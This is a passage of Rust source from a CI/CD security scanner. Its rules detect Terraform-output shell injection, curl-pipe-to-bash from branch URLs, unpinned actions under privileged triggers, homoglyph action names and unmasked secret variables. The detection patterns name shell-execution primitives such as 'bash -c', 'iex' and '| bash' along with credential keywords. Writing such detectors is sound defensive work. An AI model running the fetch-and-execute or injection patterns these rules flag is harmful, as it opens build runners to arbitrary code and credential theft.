2719///   - PowerShell `-split` / `Invoke-Command` / `Invoke-Expression` / `iex`
2720///     in the same script
2721///   - bare unquoted `$(NAME)` as a command word (line-leading)
2722///
2723/// **Severity: High.** Terraform state/outputs are often controlled by
2724/// remote backends (S3 bucket, Azure Storage) whose IAM may have weaker
2725/// access controls than the pipeline itself. The `task.setvariable` hop
2726/// launders attacker-controlled state through pipeline-variable space —
2727/// existing rules see only the in-step view.
2728pub fn terraform_output_via_setvariable_shell_expansion(graph: &AuthorityGraph) -> Vec<Finding> {
2729    // Step 0: collect every Step (in graph insertion order, which matches
2730    // YAML order) that carries a non-empty script body. Group by job name.
2731    struct StepInfo<'a> {
2732        id: NodeId,
2733        name: &'a str,
2734        body: &'a str,
2735    }
2736    let mut by_job: std::collections::BTreeMap<&str, Vec<StepInfo<'_>>> =
2737        std::collections::BTreeMap::new();
2738    for step in graph.nodes_of_kind(NodeKind::Step) {
2739        let body = match step.metadata.get(META_SCRIPT_BODY) {
2740            Some(b) if !b.is_empty() => b.as_str(),
2741            _ => continue,
2742        };
2743        let job = step
2744            .metadata
2745            .get(META_JOB_NAME)
2746            .map(String::as_str)
2747            .unwrap_or("");
2748        by_job.entry(job).or_default().push(StepInfo {
2749            id: step.id,
2750            name: step.name.as_str(),
2751            body,
2752        });
2753    }
2754
2755    let mut findings = Vec::new();
2756
2757    for (_job_name, steps) in by_job.iter() {
2758        // Phase 1: scan every step in this job for capture+setvariable.
2759        // Each capture step yields zero-or-more (variable_name) outputs.
2760        let captures: Vec<(usize, Vec<String>)> = steps
2761            .iter()
2762            .enumerate()
2763            .filter_map(|(idx, s)| {
2764                let vars = capture_phase_variables(s.body);
2765                if vars.is_empty() {
2766                    None
2767                } else {
2768                    Some((idx, vars))
2769                }
2770            })
2771            .collect();
2772
2773        if captures.is_empty() {
2774            continue;
2775        }
2776
2777        // Phase 2: for each capture step, look at all later steps in the
2778        // same job. For each later step, find any captured variable name
2779        // whose `$(NAME)` reference appears in shell-expansion position
2780        // within that later step's body.
2781        for (cap_idx, vars) in &captures {
2782            for later_idx in (cap_idx + 1)..steps.len() {
2783                let sink = &steps[later_idx];
2784                let mut hits: Vec<&str> = Vec::new();
2785                for var in vars {
2786                    if expansion_in_shell_position(sink.body, var) {
2787                        hits.push(var.as_str());
2788                    }
2789                }
2790                if hits.is_empty() {
2791                    continue;
2792                }
2793                hits.sort();
2794                hits.dedup();
2795                let cap = &steps[*cap_idx];
2796                let names = hits.join(", ");
2797                findings.push(Finding {
2798                    severity: Severity::High,
2799                    category:
2800                        FindingCategory::TerraformOutputViaSetvariableShellExpansion,
2801                    path: None,
2802                    nodes_involved: vec![cap.id, sink.id],
2803                    message: format!(
2804                        "Step '{}' captures terraform output and emits ##vso[task.setvariable] for [{}]; later step '{}' (same job) expands $({}) in shell-expansion position — attacker control of terraform state ({{S3, Azure Storage}} backend) becomes shell injection across the pipeline-variable hop",
2805                        cap.name,
2806                        names,
2807                        sink.name,
2808                        hits[0],
2809                    ),
2810                    recommendation: Recommendation::Manual {
2811                        action: "Pass the captured value through the downstream step's `env:` block (so the runtime quotes it as a shell variable: `env: { GDSVMS: $(gdsvms) }` then `$GDSVMS` in script) instead of YAML-interpolating `$(VAR)` into the script body. Where the value is structured (comma list of VM names), validate the shape — e.g. `[[ \"$VAR\" =~ ^[a-zA-Z0-9._,-]+$ ]]` — before splitting/looping. Consider lock-down of the terraform state backend (S3 bucket policy, Azure Storage RBAC) so untrusted parties cannot rewrite outputs.".into(),
2812                    },
2813                    source: FindingSource::BuiltIn,
2814                    extras: FindingExtras::default(),
2815                });
2816            }
2817        }
2818    }
2819
2820    findings
2821}
2822
2823/// Phase-1 helper: given an inline-script body, return the list of
2824/// pipeline-variable names that the body sets via
2825/// `##vso[task.setvariable variable=NAME ...]` *only when* the body also
2826/// contains a "terraform output capture" signal.
2827///
2828/// We do not attempt to data-flow-link the captured value to the
2829/// `setvariable` directive — the proximity within a single inline script
2830/// is the operative signal. The two corpus exemplars
2831/// (`sharedservice-solarwinds` and `userapp-mvit-prd`) both pair the
2832/// capture and the setvariable inside the same PowerShell block.
2833fn capture_phase_variables(body: &str) -> Vec<String> {
2834    if !body_has_terraform_output_capture(body) {
2835        return Vec::new();
2836    }
2837    setvariable_names_in(body)
2838}
2839
2840/// True iff the body contains a terraform-output capture signal.
2841fn body_has_terraform_output_capture(body: &str) -> bool {
2842    // Literal CLI invocation, with or without subcommand args. We check
2843    // case-sensitive because terraform CLI is always lowercase.
2844    if body.contains("terraform output") {
2845        return true;
2846    }
2847    // Env-var convention used by the `TerraformCLI@*` task family
2848    // (`command: output` writes results into `TF_OUT_<name>` env vars
2849    // surfaced into the next step). PowerShell form: `$env:TF_OUT_X`.
2850    // POSIX form: `$TF_OUT_X` or `${TF_OUT_X}`.
2851    if body.contains("$env:TF_OUT_") || body.contains("${env:TF_OUT_") {
2852        return true;
2853    }
2854    // POSIX shell. Use a manual scan — we want to match `$TF_OUT_X` and
2855    // `${TF_OUT_X}` but avoid matching arbitrary substrings like
2856    // `MY_TF_OUT_X` that aren't a variable expansion.
2857    for marker in ["$TF_OUT_", "${TF_OUT_"] {
2858        if body.contains(marker) {
2859            return true;
2860        }
2861    }
2862    false
2863}
2864
2865/// Extract the variable names set by every
2866/// `##vso[task.setvariable variable=NAME ...]` directive in the body.
2867/// Tolerates whitespace and either `;` or `]` as the variable= terminator.
2868fn setvariable_names_in(body: &str) -> Vec<String> {
2869    let needle = "##vso[task.setvariable variable=";
2870    let mut out: Vec<String> = Vec::new();
2871    let mut cursor = 0;
2872    while let Some(rel) = body[cursor..].find(needle) {
2873        let start = cursor + rel + needle.len();
2874        let tail = &body[start..];
2875        let end = tail
2876            .find(|c: char| c == ';' || c == ']' || c.is_whitespace())
2877            .unwrap_or(tail.len());
2878        let name = tail[..end].trim().to_string();
2879        if !name.is_empty()
2880            && name
2881                .chars()
2882                .all(|c| c.is_ascii_alphanumeric() || c == '_' || c == '.')
2883        {
2884            out.push(name);
2885        }
2886        cursor = start + end;
2887    }
2888    out.sort();
2889    out.dedup();
2890    out
2891}
2892
2893/// Phase-2 predicate: does `body` reference `$(name)` in a shell-expansion
2894/// position? "Shell-expansion position" means the value will be parsed by
2895/// a shell or PowerShell interpreter at runtime, rather than being fed
2896/// into a function/cmdlet that quotes its arguments.
2897fn expansion_in_shell_position(body: &str, name: &str) -> bool {
2898    let needle = format!("$({name})");
2899    if !body.contains(&needle) {
2900        return false;
2901    }
2902    // Cheap whole-body checks: if the script contains any of these
2903    // primitives anywhere, an interpolation of `$(name)` elsewhere in the
2904    // same script is at risk. The `sharedservice-solarwinds` corpus
2905    // exemplar exercises the `-split` + `Invoke-Command` + foreach branch
2906    // — all three signals fire.
2907    let sigil_set: &[&str] = &[
2908        "bash -c",
2909        "sh -c",
2910        "eval ",
2911        "Invoke-Expression",
2912        " iex ",
2913        "iex(",
2914        "iex (",
2915        "Invoke-Command",
2916        "-split",
2917    ];
2918    if sigil_set.iter().any(|s| body.contains(s)) {
2919        return true;
2920    }
2921    // Nested command substitution: `$(... $(name) ...)`. We look for any
2922    // `$(` occurring strictly before the first `$(name)` — ADO's
2923    // `$(macro)` and POSIX `$(cmd)` share the same surface syntax, but
2924    // any `$(` *outside* the `$(name)` itself, on the same line, indicates
2925    // the sink is being parsed inside another command substitution.
2926    for (line_no, line) in body.lines().enumerate() {
2927        let _ = line_no;
2928        if let Some(pos) = line.find(&needle) {
2929            // Search the prefix for an unclosed `$(`. Naive but adequate
2930            // for inline-script bodies (we don't attempt to balance).
2931            let prefix = &line[..pos];
2932            let opens = prefix.matches("$(").count();
2933            let closes = prefix.matches(')').count();
2934            if opens > closes {
2935                return true;
2936            }
2937        }
2938    }
2939    // Bare unquoted line-leading reference: `$(NAME) ...` with no
2940    // surrounding quotes — the value is parsed as a command line.
2941    for line in body.lines() {
2942        let trimmed = line.trim_start();
2943        if trimmed.starts_with(&needle) {
2944            // Skip the obvious assignment-to-variable forms that quote.
2945            // PowerShell `$x = "$(name)"` and POSIX `X="$(name)"` keep
2946            // the value out of the command position.
2947            return true;
2948        }
2949    }
2950    false
2951}
2952
2953/// Run all rules against a graph.
2954// ── runtime_script_fetched_from_floating_url ──────────────────
2955//
2956// Detect `run:` blocks that download a remote script from a non-pinned URL
2957// and pipe it directly to a shell interpreter. This is a pure HTTP supply-chain
2958// vector — neither `unpinned_action` (which inspects `uses:`) nor
2959// `floating_image` (containers) covers it.
2960//
2961// Detection primitive (URL must be both):
2962//   1. shell-style fetch+execute: `curl … | bash`, `wget … | sh`,
2963//      `bash <(curl …)`, or `deno run https://…`
2964//   2. URL is mutable: contains `refs/heads/`, `/main/`, `/master/`,
2965//      `/develop/`, `/HEAD/`, OR is a raw `git clone`/`fetch` from a
2966//      branch URL with no version pin.
2967//
2968// Severity: High (one upstream commit lands code on every consumer).
2969fn body_has_pipe_to_shell_with_floating_url(body: &str) -> bool {
2970    // Cheap pre-filter to keep the regex-free scan fast.
2971    let lower = body;
2972    let has_curl_or_wget = lower.contains("curl") || lower.contains("wget");
2973    let has_pipe_shell = lower.contains("| bash")
2974        || lower.contains("|bash")
2975        || lower.contains("| sh")
2976        || lower.contains("|sh")
2977        || lower.contains("<(curl")
2978        || lower.contains("<(wget");
2979    let has_deno_remote = lower.contains("deno run http://") || lower.contains("deno run https://");
2980
2981    if !((has_curl_or_wget && has_pipe_shell) || has_deno_remote) {
2982        return false;
2983    }
2984
2985    // For each line that contains a fetch+pipe or a deno-remote run, check
2986    // whether the URL on that line is mutable.
2987    for line in body.lines() {
2988        let line_has_pipe_shell = line.contains("| bash")
2989            || line.contains("|bash")
2990            || line.contains("| sh")
2991            || line.contains("|sh")
2992            || line.contains("<(curl")
2993            || line.contains("<(wget");
2994        let line_has_deno_remote =
2995            line.contains("deno run http://") || line.contains("deno run https://");
2996
2997        if !(line_has_pipe_shell || line_has_deno_remote) {
2998            continue;
2999        }
3000
3001        if line_url_is_mutable(line) {
3002            return true;
3003        }
3004    }
3005    false
3006}
3007
3008fn line_url_is_mutable(line: &str) -> bool {
3009    // Mutable URL markers.
3010    const MUTABLE_PATHS: &[&str] = &[
3011        "refs/heads/",
3012        "/HEAD/",
3013        "/main/",
3014        "/master/",
3015        "/develop/",
3016        "/trunk/",
3017        "/latest/",
3018    ];
3019    for marker in MUTABLE_PATHS {
3020        if line.contains(marker) {
3021            return true;
3022        }
3023    }
3024    // Bare `raw.githubusercontent.com/<owner>/<repo>/<ref>/...` where <ref>
3025    // is the literal `main`/`master` segment was caught above. We could be
3026    // looser and flag any URL with no version-like segment, but that
3027    // sacrifices precision — the marker list above is the conservative core.
3028    false
3029}
3030
3031/// Rule: a `run:` step pipes a remotely-fetched script into a shell, where
3032/// the URL is pinned to a mutable branch ref. The remote host's branch tip
3033/// becomes a write-anywhere primitive on the runner.
3034///
3035/// Severity: High.
3036pub fn runtime_script_fetched_from_floating_url(graph: &AuthorityGraph) -> Vec<Finding> {
3037    let mut findings = Vec::new();
3038
3039    for step in graph.nodes_of_kind(NodeKind::Step) {
3040        let body = match step.metadata.get(META_SCRIPT_BODY) {
3041            Some(b) if !b.is_empty() => b,
3042            _ => continue,
3043        };
3044
3045        if !body_has_pipe_to_shell_with_floating_url(body) {
3046            continue;
3047        }
3048
3049        findings.push(Finding {
3050            severity: Severity::High,
3051            category: FindingCategory::RuntimeScriptFetchedFromFloatingUrl,
3052            path: None,
3053            nodes_involved: vec![step.id],
3054            message: format!(
3055                "Step '{}' downloads and executes a script from a mutable URL (curl|bash, wget|sh, or `deno run` against a branch ref) — whoever controls that branch executes arbitrary code on the runner",
3056                step.name
3057            ),
3058            recommendation: Recommendation::Manual {
3059                action: "Pin the URL to a release tag or commit SHA (e.g. .../v1.2.3/install.sh) and verify the download against a known checksum before executing it. Avoid `curl … | bash` entirely where possible — fetch to a file, inspect, then run.".into(),
3060            },
3061            source: FindingSource::BuiltIn,
3062                extras: FindingExtras::default(),
3063});
3064    }
3065
3066    findings
3067}
3068
3069// ── pr_trigger_with_floating_action_ref ────────────────────────
3070//
3071// Detect the high-severity conjunction: workflow runs in privileged base-repo
3072// context (`pull_request_target` / `issue_comment` / `workflow_run`) AND uses
3073// at least one action by mutable ref (not SHA). Either condition alone is a
3074// finding from another rule; the conjunction is critical because the trigger
3075// grants write-token authority *and* the floating action lets an attacker
3076// substitute the executed code.
3077fn trigger_is_privileged_pr_class(trigger: &str) -> bool {
3078    // META_TRIGGER may be a single trigger or a comma-separated list.
3079    trigger.split(',').any(|t| {
3080        let t = t.trim();
3081        matches!(t, "pull_request_target" | "issue_comment" | "workflow_run")
3082    })
3083}
3084
3085/// Rule: privileged PR-class trigger combined with a non-SHA-pinned action ref.
3086///
3087/// Severity: Critical (full repo write token + attacker-controlled action code).
3088pub fn pr_trigger_with_floating_action_ref(graph: &AuthorityGraph) -> Vec<Finding> {
3089    let trigger = match graph.metadata.get(META_TRIGGER) {
3090        Some(t) => t.as_str(),
3091        None => return Vec::new(),
3092    };
3093    if !trigger_is_privileged_pr_class(trigger) {
3094        return Vec::new();
3095    }
3096
3097    let mut findings = Vec::new();
3098    let mut seen = std::collections::HashSet::new();
3099
3100    for image in graph.nodes_of_kind(NodeKind::Image) {
3101        // Skip first-party (local actions, self-hosted runner labels).
3102        if image.trust_zone == TrustZone::FirstParty {
3103            continue;
3104        }
3105        // Skip container images (covered by floating_image).
3106        if image
3107            .metadata
3108            .get(META_CONTAINER)
3109            .map(|v| v == "true")
3110            .unwrap_or(false)
3111        {
3112            continue;
3113        }
3114        // Skip self-hosted-runner Image nodes (those are FirstParty anyway,
3115        // but be defensive against future refactors).
3116        if image.metadata.contains_key(META_SELF_HOSTED) {
3117            continue;
3118        }
3119        // Already SHA-pinned (semantically valid) → safe.
3120        if is_pin_semantically_valid(&image.name) {
3121            continue;
3122        }
3123        // Dedupe per action reference.
3124        if !seen.insert(&image.name) {
3125            continue;
3126        }
3127
3128        findings.push(Finding {
3129            severity: Severity::Critical,
3130            category: FindingCategory::PrTriggerWithFloatingActionRef,
3131            path: None,
3132            nodes_involved: vec![image.id],
3133            message: format!(
3134                "Workflow trigger '{trigger}' runs in privileged base-repo context and step uses unpinned action '{}' — anyone who can push to that action's branch executes arbitrary code with full repo write token",
3135                image.name
3136            ),
3137            recommendation: Recommendation::PinAction {
3138                current: image.name.clone(),
3139                pinned: format!(
3140                    "{}@<sha256-digest>",
3141                    image.name.split('@').next().unwrap_or(&image.name)
3142                ),
3143            },
3144            source: FindingSource::BuiltIn,
3145                extras: FindingExtras::default(),
3146});
3147    }
3148
3149    findings
3150}
3151
3152// ── homoglyph_in_action_ref ──────────────────────────────────
3153//
3154// Detect `uses:` action references containing non-ASCII characters.
3155// Legitimate action references (owner/repo@ref) are purely ASCII.
3156// Non-ASCII characters indicate a possible Unicode confusable / homoglyph
3157// attack where a malicious action name visually impersonates a trusted one.
3158
3159/// Rule G2: action reference contains non-ASCII characters (possible homoglyph).
3160///
3161/// Iterates every `Image` node in the graph (which represent `uses:` action
3162/// refs) and flags any whose name contains at least one non-ASCII code point.
3163/// Severity: High — potential supply-chain impersonation attack.
3164pub fn check_homoglyph_in_action_ref(graph: &AuthorityGraph) -> Vec<Finding> {
3165    let platform = graph.metadata.get(META_PLATFORM).map(|s| s.as_str());
3166    if platform != Some("github-actions") {
3167        return Vec::new();
3168    }
3169
3170    let mut findings = Vec::new();
3171
3172    for image in graph.nodes_of_kind(NodeKind::Image) {
3173        if image.name.is_ascii() {
3174            continue;
3175        }
3176
3177        // Collect the offending non-ASCII characters for the message.
3178        let bad_chars: Vec<String> = image
3179            .name
3180            .chars()
3181            .filter(|c| !c.is_ascii())
3182            .map(|c| format!("U+{:04X} '{}'", c as u32, c))
3183            .collect();
3184        let char_list = bad_chars.join(", ");
3185
3186        findings.push(Finding {
3187            severity: Severity::High,
3188            category: FindingCategory::HomoglyphInActionRef,
3189            path: None,
3190            nodes_involved: vec![image.id],
3191            message: format!(
3192                "Action reference '{}' contains non-ASCII character(s) (possible homoglyph/confusable): {}",
3193                image.name, char_list
3194            ),
3195            recommendation: Recommendation::Manual {
3196                action: "Replace the action reference with the genuine ASCII action name. Verify the action owner/repo on github.com and ensure every character in the `uses:` field is plain ASCII.".into(),
3197            },
3198            source: FindingSource::BuiltIn,
3199            extras: FindingExtras::default(),
3200        });
3201    }
3202
3203    findings
3204}
3205
3206// ── untrusted_api_response_to_env_sink ────────────────────────
3207//
3208// Detect `workflow_run` consumer workflows that capture an external API
3209// response (gh CLI, curl against api.github.com) and write it into the GHA
3210// environment file. A poisoned API field (branch name, PR title, commit
3211// message) injects environment variables into every subsequent step in the
3212// same job.
3213fn body_writes_api_response_to_env_sink(body: &str) -> bool {
3214    // First, the sink: a redirect to one of the GHA gate files.
3215    let writes_env_sink = body.contains("$GITHUB_ENV")
3216        || body.contains("${GITHUB_ENV}")
3217        || body.contains("$GITHUB_OUTPUT")
3218        || body.contains("${GITHUB_OUTPUT}")
3219        || body.contains("$GITHUB_PATH")
3220        || body.contains("${GITHUB_PATH}");
3221    if !writes_env_sink {
3222        return false;
3223    }
3224
3225    // Then, an API source on the same body: gh CLI or a direct REST call.
3226    let calls_api = body.contains("gh pr view")
3227        || body.contains("gh pr list")
3228        || body.contains("gh api ")
3229        || body.contains("gh issue view")
3230        || body.contains("api.github.com");
3231    if !calls_api {
3232        return false;
3233    }
3234
3235    // Tier-1 precision: same-line conjunction (the canonical case in corpus,
3236    // e.g. `gh pr view --jq '"PR_NUMBER=\(.number)"' >> $GITHUB_ENV`).
3237    let lines: Vec<&str> = body.lines().collect();
3238    for line in &lines {
3239        let line_calls_api = line.contains("gh pr view")
3240            || line.contains("gh pr list")
3241            || line.contains("gh api ")
3242            || line.contains("gh issue view")
3243            || line.contains("api.github.com");
3244        let line_writes_sink = line.contains("$GITHUB_ENV")
3245            || line.contains("${GITHUB_ENV}")
3246            || line.contains("$GITHUB_OUTPUT")
3247            || line.contains("${GITHUB_OUTPUT}")
3248            || line.contains("$GITHUB_PATH")
3249            || line.contains("${GITHUB_PATH}");
3250        if line_calls_api && line_writes_sink {
3251            return true;
3252        }
3253    }
3254
3255    // Tier-2 precision: API call captures into a variable, and a *nearby*
3256    // line redirects that same variable to the env sink. Without dataflow,
3257    // we approximate "nearby" as: an API line and a sink line within 6 lines
3258    // of each other. This catches multi-step capture-then-write idioms while
3259    // keeping false-positive risk acceptable.
3260    let mut last_api_line: Option<usize> = None;
3261    for (i, line) in lines.iter().enumerate() {
3262        let line_calls_api = line.contains("gh pr view")
3263            || line.contains("gh pr list")
3264            || line.contains("gh api ")
3265            || line.contains("gh issue view")
3266            || line.contains("api.github.com");
3267        if line_calls_api {
3268            last_api_line = Some(i);
3269        }
3270        let line_writes_sink = line.contains("$GITHUB_ENV")
3271            || line.contains("${GITHUB_ENV}")
3272            || line.contains("$GITHUB_OUTPUT")
3273            || line.contains("${GITHUB_OUTPUT}")
3274            || line.contains("$GITHUB_PATH")
3275            || line.contains("${GITHUB_PATH}");
3276        if line_writes_sink {
3277            if let Some(api_idx) = last_api_line {
3278                if i.saturating_sub(api_idx) <= 6 {
3279                    return true;
3280                }
3281            }
3282        }
3283    }
3284
3285    false
3286}
3287
3288/// Rule: workflow_run-triggered workflow writes an API response value to the
3289/// GHA environment gate. Branch name / PR title in the response can carry
3290/// newline-injected env-var assignments.
3291///
3292/// Severity: High.
3293pub fn untrusted_api_response_to_env_sink(graph: &AuthorityGraph) -> Vec<Finding> {
3294    let trigger = match graph.metadata.get(META_TRIGGER) {
3295        Some(t) => t.as_str(),
3296        None => return Vec::new(),
3297    };
3298    let trigger_in_scope = trigger.split(',').any(|t| {
3299        let t = t.trim();
3300        matches!(t, "workflow_run" | "pull_request_target" | "issue_comment")
3301    });
3302    if !trigger_in_scope {
3303        return Vec::new();
3304    }
3305
3306    let mut findings = Vec::new();
3307
3308    for step in graph.nodes_of_kind(NodeKind::Step) {
3309        let body = match step.metadata.get(META_SCRIPT_BODY) {
3310            Some(b) if !b.is_empty() => b,
3311            _ => continue,
3312        };
3313
3314        if !body_writes_api_response_to_env_sink(body) {
3315            continue;
3316        }
3317
3318        findings.push(Finding {
3319            severity: Severity::High,
3320            category: FindingCategory::UntrustedApiResponseToEnvSink,
3321            path: None,
3322            nodes_involved: vec![step.id],
3323            message: format!(
3324                "Step '{}' captures a GitHub API response (gh CLI or api.github.com) into the GHA env gate ($GITHUB_ENV/$GITHUB_OUTPUT/$GITHUB_PATH) under trigger '{trigger}' — attacker-influenced fields (branch name, PR title) can inject environment variables for every subsequent step in the same job",
3325                step.name
3326            ),
3327            recommendation: Recommendation::Manual {
3328                action: "Validate the API field with a strict regex before redirecting (e.g. only `[0-9]+` for a PR number), or write only known-numeric fields. Never pipe free-form fields like branch name or PR title directly into $GITHUB_ENV.".into(),
3329            },
3330            source: FindingSource::BuiltIn,
3331            extras: FindingExtras::default(),
3332        });
3333    }
3334
3335    findings
3336}
3337
3338// ── pr_build_pushes_image_with_floating_credentials ────────────
3339//
3340// Detect: workflow triggered by a PR-class event uses a container-registry
3341// login action that is NOT SHA-pinned. The login action receives credentials
3342// (OIDC token or static registry secret) — a compromise of the action's
3343// branch lets an attacker exfiltrate them.
3344fn is_registry_login_action(action: &str) -> bool {
3345    let bare = action.split('@').next().unwrap_or(action);
3346    matches!(
3347        bare,
3348        "docker/login-action"
3349            | "aws-actions/amazon-ecr-login"
3350            | "aws-actions/configure-aws-credentials"
3351            | "azure/docker-login"
3352            | "azure/login"
3353            | "google-github-actions/auth"
3354            | "google-github-actions/setup-gcloud"
3355    ) || bare.ends_with("/login-to-gar")
3356        || bare.ends_with("/dockerhub-login")
3357        || bare.ends_with("/login-to-ecr")
3358        || bare.ends_with("/login-to-acr")
3359}
3360
3361fn trigger_includes_pull_request(trigger: &str) -> bool {
3362    trigger.split(',').any(|t| {
3363        let t = t.trim();
3364        // Match `pull_request` and `pull_request_target` — both are PR-class.
3365        t == "pull_request" || t == "pull_request_target"
3366    })
3367}
3368
3369/// Rule: PR-triggered workflow uses a non-SHA-pinned container-registry login
3370/// action. Compound vector: floating action holds registry creds + PR-controlled
3371/// image content reaches a shared registry.
3372///
3373/// Severity: High.
3374pub fn pr_build_pushes_image_with_floating_credentials(graph: &AuthorityGraph) -> Vec<Finding> {
3375    let trigger = match graph.metadata.get(META_TRIGGER) {
3376        Some(t) => t.as_str(),
3377        None => return Vec::new(),
3378    };
3379    if !trigger_includes_pull_request(trigger) {
3380        return Vec::new();
3381    }
3382
3383    let mut findings = Vec::new();
3384    let mut seen = std::collections::HashSet::new();
3385
3386    for image in graph.nodes_of_kind(NodeKind::Image) {
3387        if image.trust_zone == TrustZone::FirstParty {
3388            continue;
3389        }
3390        if image
3391            .metadata
3392            .get(META_CONTAINER)
3393            .map(|v| v == "true")
3394            .unwrap_or(false)
3395        {
3396            continue;
3397        }
3398        if !is_registry_login_action(&image.name) {
3399            continue;
3400        }
3401        if is_pin_semantically_valid(&image.name) {
3402            continue;
3403        }
3404        if !seen.insert(&image.name) {
3405            continue;
3406        }
3407
3408        findings.push(Finding {
3409            severity: Severity::High,
3410            category: FindingCategory::PrBuildPushesImageWithFloatingCredentials,
3411            path: None,
3412            nodes_involved: vec![image.id],
3413            message: format!(
3414                "PR-triggered workflow ('{trigger}') uses unpinned registry-login action '{}' — a compromise of that action's branch exfiltrates registry credentials or OIDC tokens, and any PR-controlled image content then reaches a shared registry",
3415                image.name
3416            ),
3417            recommendation: Recommendation::PinAction {
3418                current: image.name.clone(),
3419                pinned: format!(
3420                    "{}@<sha256-digest>",
3421                    image.name.split('@').next().unwrap_or(&image.name)
3422                ),
3423            },
3424            source: FindingSource::BuiltIn,
3425            extras: FindingExtras::default(),
3426        });
3427    }
3428
3429    findings
3430}
3431
3432/// Rule: ADO `##vso[task.setvariable]` with a sensitive-named variable
3433/// that omits `issecret=true` (either `issecret=false` or no `issecret`
3434/// flag at all). Without the flag the variable value is printed in
3435/// plaintext to the pipeline log and is not masked in downstream step
3436/// output.
3437///
3438/// Detection (per Step):
3439///   * `META_PLATFORM == "azure-devops"` (gates GHA/GitLab out)
3440///   * Step carries a non-empty `META_SCRIPT_BODY`
3441///   * Body contains `##vso[task.setvariable variable=NAME ...]` where
3442///     NAME (case-insensitive) matches a sensitive keyword: `password`,
3443///     `passwd`, `token`, `secret`, `key`, `credential`, `cert`,
3444///     `apikey`, `auth`
3445///   * The directive does NOT contain `issecret=true` (case-insensitive)
3446///     between `variable=NAME` and the closing `]`
3447///
3448/// Severity: High.
3449pub fn setvariable_issecret_false(graph: &AuthorityGraph) -> Vec<Finding> {
3450    if !graph_is_platform(graph, "azure-devops") {
3451        return Vec::new();
3452    }
3453
3454    const SENSITIVE_KEYWORDS: &[&str] = &[
3455        "password",
3456        "passwd",
3457        "token",
3458        "secret",
3459        "key",
3460        "credential",
3461        "cert",
3462        // "api_key" omitted: tokenizer splits on '_', so this keyword can never
3463        // match a single token — "key" already covers AZURE_API_KEY etc.
3464        "apikey",
3465        "auth",
3466    ];
3467
3468    let needle = "##vso[task.setvariable variable=";
3469
3470    let mut findings = Vec::new();
3471
3472    for step in graph.nodes_of_kind(NodeKind::Step) {
3473        let body = match step.metadata.get(META_SCRIPT_BODY) {
3474            Some(b) if !b.trim().is_empty() => b,
3475            _ => continue,
3476        };
3477
3478        let lower = body.to_lowercase();
3479        let mut cursor = 0;
3480
3481        while let Some(rel) = lower[cursor..].find(needle) {
3482            let start = cursor + rel + needle.len();
3483            let tail = &lower[start..];
3484
3485            // Extract variable name (terminated by `;`, `]`, or whitespace).
3486            let name_end = tail
3487                .find(|c: char| c == ';' || c == ']' || c.is_whitespace())
3488                .unwrap_or(tail.len());
3489            let var_name = &tail[..name_end];
3490
3491            if var_name.is_empty() {
3492                cursor = start + name_end;
3493                continue;
3494            }
3495
3496            // Token-split on `_`/`-` so "key" matches STORAGE_ACCOUNT_KEY but not "keyvaultname".
3497            let is_sensitive = var_name
3498                .split(['_', '-'])
3499                .any(|tok| SENSITIVE_KEYWORDS.contains(&tok));
3500
3501            if !is_sensitive {
3502                cursor = start + name_end;
3503                continue;
3504            }
3505
3506            // Grab the rest of the directive up to `]` to check for issecret.
3507            let directive_end = tail.find(']').unwrap_or(tail.len());
3508            let directive_tail = &tail[..directive_end];
3509            let has_issecret_true = directive_tail.contains("issecret=true");
3510
3511            if !has_issecret_true {
3512                // Recover the original-case variable name from the body.
3513                let orig_name = &body[start..start + name_end];
3514
3515                findings.push(Finding {
3516                    severity: Severity::High,
3517                    category: FindingCategory::SetvariableIssecretFalse,
3518                    path: None,
3519                    nodes_involved: vec![step.id],
3520                    message: format!(
3521                        "ADO setvariable with sensitive name '{}' uses issecret=false or omits issecret flag, value printed in plaintext logs",
3522                        orig_name,
3523                    ),
3524                    recommendation: Recommendation::Manual {
3525                        action: format!(
3526                            "Add `issecret=true` to the setvariable directive: `##vso[task.setvariable variable={};issecret=true]`",
3527                            orig_name,
3528                        ),
3529                    },
3530                    source: FindingSource::BuiltIn,
3531                    extras: FindingExtras::default(),
3532                });
3533            }
3534
3535            cursor = start + name_end;
3536        }
3537    }
3538
3539    findings
3540}
3541
3542pub fn run_all_rules(graph: &AuthorityGraph, max_hops: usize) -> Vec<Finding> {
3543    let mut findings = Vec::new();
3544    // MVP rules
3545    findings.extend(authority_propagation(graph, max_hops));
3546    findings.extend(over_privileged_identity(graph));
3547    findings.extend(unpinned_action(graph));
3548    findings.extend(untrusted_with_authority(graph));
3549    findings.extend(artifact_boundary_crossing(graph));
3550    // Stretch rules
3551    findings.extend(long_lived_credential(graph));
3552    findings.extend(floating_image(graph));
3553    findings.extend(persisted_credential(graph));
3554    findings.extend(trigger_context_mismatch(graph));
3555    findings.extend(cross_workflow_authority_chain(graph));
3556    findings.extend(authority_cycle(graph));
3557    findings.extend(uplift_without_attestation(graph));
3558    findings.extend(self_mutating_pipeline(graph));
3559    findings.extend(checkout_self_pr_exposure(graph));
3560    findings.extend(variable_group_in_pr_job(graph));
3561    findings.extend(self_hosted_pool_pr_hijack(graph));
3562    findings.extend(shared_self_hosted_pool_no_isolation(graph));
3563    findings.extend(service_connection_scope_mismatch(graph));
3564    findings.extend(template_extends_unpinned_branch(graph));
3565    findings.extend(template_repo_ref_is_feature_branch(graph));
3566    findings.extend(vm_remote_exec_via_pipeline_secret(graph));
3567    findings.extend(short_lived_sas_in_command_line(graph));
3568    // ADO inline-script secret-leak rules
3569    findings.extend(secret_to_inline_script_env_export(graph));
3570    findings.extend(secret_materialised_to_workspace_file(graph));
3571    findings.extend(keyvault_secret_to_plaintext(graph));
3572    findings.extend(setvariable_issecret_false(graph));
3573    findings.extend(terraform_auto_approve_in_prod(graph));
3574    findings.extend(addspn_with_inline_script(graph));
3575    findings.extend(parameter_interpolation_into_shell(graph));
3576    // GHA red-team-derived rules
3577    findings.extend(runtime_script_fetched_from_floating_url(graph));
3578    findings.extend(pr_trigger_with_floating_action_ref(graph));
3579    findings.extend(check_homoglyph_in_action_ref(graph));
3580    findings.extend(untrusted_api_response_to_env_sink(graph));
3581    findings.extend(pr_build_pushes_image_with_floating_credentials(graph));
3582    findings.extend(secret_via_env_gate_to_untrusted_consumer(graph));
3583    // Blue-team positive invariants (negative-space rules — fire on absence
3584    // of expected defenses)
3585    findings.extend(no_workflow_level_permissions_block(graph));
3586    findings.extend(prod_deploy_job_no_environment_gate(graph));
3587    findings.extend(long_lived_secret_without_oidc_recommendation(graph));
3588    findings.extend(pull_request_workflow_inconsistent_fork_check(graph));
3589    findings.extend(gitlab_deploy_job_missing_protected_branch_only(graph));
3590    findings.extend(terraform_output_via_setvariable_shell_expansion(graph));
